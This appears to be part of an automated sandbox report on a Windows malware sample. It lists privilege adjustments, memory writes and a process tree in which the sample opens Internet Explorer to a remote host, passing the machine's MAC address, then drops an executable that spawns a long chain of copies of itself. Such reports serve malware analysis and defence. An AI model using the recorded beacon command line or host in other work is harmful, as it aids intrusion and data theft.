SeLoadDriverPrivilege 1960 sUUAXgs.exe Token: SeLoadDriverPrivilege 2040 sUUAXgs.exe Token: SeLoadDriverPrivilege 748 sUUAXgs.exe Token: SeLoadDriverPrivilege 1892 sUUAXgs.exe Token: SeLoadDriverPrivilege 1544 sUUAXgs.exe Token: SeLoadDriverPrivilege 1540 sUUAXgs.exe Token: SeLoadDriverPrivilege 108 sUUAXgs.exe Token: SeLoadDriverPrivilege 2220 sUUAXgs.exe Token: SeLoadDriverPrivilege 2968 sUUAXgs.exe Token: SeLoadDriverPrivilege 2228 sUUAXgs.exe Token: SeLoadDriverPrivilege 3052 sUUAXgs.exe Token: SeLoadDriverPrivilege 2208 sUUAXgs.exe Token: SeLoadDriverPrivilege 1252 sUUAXgs.exe Token: SeLoadDriverPrivilege 1504 sUUAXgs.exe Token: SeLoadDriverPrivilege 1668 sUUAXgs.exe Token: 
SeLoadDriverPrivilege 868 sUUAXgs.exe Token: SeLoadDriverPrivilege 2436 sUUAXgs.exe Token: SeLoadDriverPrivilege 2468 sUUAXgs.exe Token: SeLoadDriverPrivilege 1608 sUUAXgs.exe Token: SeLoadDriverPrivilege 1600 sUUAXgs.exe Token: SeLoadDriverPrivilege 1520 sUUAXgs.exe Token: SeLoadDriverPrivilege 2260 sUUAXgs.exe Token: SeLoadDriverPrivilege 2680 sUUAXgs.exe Token: SeLoadDriverPrivilege 2796 sUUAXgs.exe Token: SeLoadDriverPrivilege 2372 sUUAXgs.exe Token: SeLoadDriverPrivilege 2692 sUUAXgs.exe Token: SeLoadDriverPrivilege 2824 sUUAXgs.exe Token: SeLoadDriverPrivilege 2740 sUUAXgs.exe Token: SeLoadDriverPrivilege 2188 sUUAXgs.exe Token: SeLoadDriverPrivilege 1032 sUUAXgs.exe Token: SeLoadDriverPrivilege 2644 sUUAXgs.exe Token: SeLoadDriverPrivilege 2540 sUUAXgs.exe Token: SeLoadDriverPrivilege 2608 sUUAXgs.exe Token: SeLoadDriverPrivilege 2580 sUUAXgs.exe Token: SeLoadDriverPrivilege 2196 sUUAXgs.exe Token: SeLoadDriverPrivilege 1532 sUUAXgs.exe Token: SeLoadDriverPrivilege 2788 sUUAXgs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid   Process
2288  IEXPLORE.EXE
Suspicious use of SetWindowsHookEx 6 IoCs
pid   Process
2288  IEXPLORE.EXE
2288  IEXPLORE.EXE
2720  IEXPLORE.EXE
2720  IEXPLORE.EXE
2720  IEXPLORE.EXE
2720  IEXPLORE.EXE
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2936 wrote 
to memory of 2708 2936 sUUAXgs.exe 38 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46
Processes
depth | PID | image path | command line
1 | PID:524 | C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
2 | PID:2176 | C:\Program Files (x86)\Internet Explorer\iexplore.exe | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=CE:96:44:F3:BB:BD&UserId=117&Bate=1.06&ThreadNum=3&Url=;-
- Suspicious use of WriteProcessMemory
3 | PID:2288 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=CE:96:44:F3:BB:BD&UserId=117&Bate=1.06&ThreadNum=3&Url=;-
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
4 | PID:2720 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:275457 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
2 | PID:2388 | \??\c:\FVe1JJh.exe | c:\FVe1JJh.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
3 | PID:2664 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
4 | PID:2860 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
5 | PID:2936 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
6 | PID:2708 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
7 | PID:2528 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
8 | PID:2572 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
9 | PID:2232 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
10 | PID:2104 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
11 | PID:2748 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
12 | PID:1664 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
13 | PID:1784 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
14 | PID:2068 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
15 | PID:1264 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
16 | PID:1336 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
17 | PID:2876 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
18 | PID:2908 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
19 | PID:2896 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
20 | PID:3056 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
21 | PID:2184 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
22 | PID:1428 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
23 | PID:380 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
24 | PID:2960 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
25 | PID:1696 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
26 | PID:736 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
27 | PID:1076 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
28 | PID:1960 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
29 | PID:2040 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
30 | PID:748 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
31 | PID:1892 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
32 | PID:1544 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
33 | PID:1540 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
34 | PID:108 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
35 | PID:2220 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
36 | PID:2968 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
37 | PID:2228 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
38 | PID:3052 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
39 | PID:2208 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
40 | PID:1252 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
41 | PID:1504 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
42 | PID:1668 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
43 | PID:868 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
44 | PID:2436 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
45 | PID:2468 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
46 | PID:1608 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
47 | PID:1600 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
48 | PID:1520 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
49 | PID:2260 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
50 | PID:2680 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
51 | PID:2796 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
52 | PID:2372 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
53 | PID:2692 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
54 | PID:2824 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
55 | PID:2740 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
56 | PID:2188 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
57 | PID:1032 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
58 | PID:2644 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
59 | PID:2540 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
60 | PID:2608 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
61 | PID:2580 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
62 | PID:2196 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
63 | PID:1532 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
64 | PID:2788 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
65 | PID:1548 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Executes dropped EXE
66 | PID:1620 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
67 | PID:2600 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
68 | PID:2752 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
69 | PID:2000 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
70 | PID:1432 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
71 | PID:1396 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Enumerates connected drives
72 | PID:1760 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
73 | PID:2028 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
74 | PID:2632 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
75 | PID:2384 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Enumerates connected drives
76 | PID:2348 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
77 | PID:1980 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
78 | PID:1480 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
79 | PID:2656 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
80 | PID:2952 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
81 | PID:1244 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
82 | PID:1632 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
83 | PID:888 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
84 | PID:624 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
85 | PID:1564 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
86 | PID:1404 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Drops file in System32 directory
87 | PID:552 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
88 | PID:1964 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
89 | PID:2420 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
90 | PID:984 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
91 | PID:2168 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
92 | PID:2352 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
93 | PID:2380 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
94 | PID:3048 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
95 | PID:2904 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
96 | PID:1288 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
97 | PID:1528 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
98 | PID:1940 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
99 | PID:1228 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
100 | PID:2976 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
101 | PID:1272 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
102 | PID:944 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
103 | PID:1124 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
104 | PID:568 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
105 | PID:1284 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
106 | PID:2616 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
107 | PID:1920 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
108 | PID:2648 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
109 | PID:1080 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
